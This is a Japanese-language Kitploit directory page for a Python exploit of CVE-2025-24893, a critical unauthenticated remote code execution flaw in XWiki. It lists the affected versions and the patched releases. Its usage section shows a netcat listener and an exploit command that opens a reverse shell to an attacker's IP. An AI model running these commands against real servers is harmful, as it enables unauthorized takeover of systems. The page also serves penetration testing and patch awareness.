Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/hasecto/cve-2025-24893
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubhasecto/cve-2025-24893

CVE-2025-24893

XWikiにおけるリモートコード実行(RCE)エクスプロイト

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893

XWiki上でのリモートコード実行(RCE)エクスプロイト

CVE-2025-24893に対するPython3エクスプロイト。XWikiプラットフォームに影響する、認証不要のリモートコード実行(RCE)の重大な脆弱性です。

このスクリプトは、SolrSearchマクロコンポーネント内のコード/式インジェクション(CWE-95)の欠陥を悪用します。この欠陥により、攻撃者は基盤となるオペレーティングシステム上で任意のGroovy/Javaコードを実行できます。エクスプロイトは、JavaのRuntime.getRuntime().exec()関数のコマンド解釈の制限を回避するために、自動的にBase64エンコーディングを実行します。

📊 脆弱性の詳細

  • CVE ID: CVE-2025-24893
  • CVSSスコア: 9.8 重大 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CWE: CWE-95 (式言語式の不適切な無害化 / 評価インジェクション)
  • 対象コンポーネント: /bin/get/Main/SolrSearch (textパラメータ経由)

🔍 影響を受けるバージョン

  • 5.3-milestone-2 から 15.10.10 までのすべてのバージョン
  • 16.0.0-rc-1 から 16.4.0 までのバージョン

🚀 使用方法

1. Kali Linuxでリスナー(Netcat)を起動:

root@kitploit:~
nc -lvnp 4444

2. エクスプロイトを実行:

root@kitploit:~
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>

例:

root@kitploit:~
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444

🛠️ 必要条件

  • Python 3.x
  • requestsライブラリ

必要な依存関係をインストールするには:

root@kitploit:~
pip install requests

🛡️ 修正

XWikiインスタンスを修正済みの公式バージョン(15.10.11、16.4.1、16.5.0-rc-1 またはそれ以降)にアップデートしてください。

⚠️ 法的免責事項

このスクリプトは、教育目的、許可されたセキュリティ監査、および侵入テスト(ペネトレーションテスト)のためにのみ開発されています。作者は、このツールによって引き起こされた不正使用、損害、または違法行為について一切の責任を負いません。事前の許可なしに本スクリプトをターゲットに対して使用することは、固く禁じられています。

ツールをダウンロード